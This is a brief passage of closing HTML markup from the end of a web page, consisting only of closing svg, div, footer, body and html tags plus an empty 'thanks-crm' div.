  </svg>
    
  
  
                        </div>
                                    </div>
              </div>
          </div>
  
      
  </div>
      </footer>
    
  
  
  
    
  
      

  
  
    <div class="thanks-crm"></div>
</body></html>